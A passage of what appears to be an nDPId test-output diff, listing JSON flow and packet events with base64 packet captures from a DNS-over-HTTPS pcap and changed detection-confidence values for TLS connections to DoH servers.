+00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is
33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc
9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM
5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSms
TNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 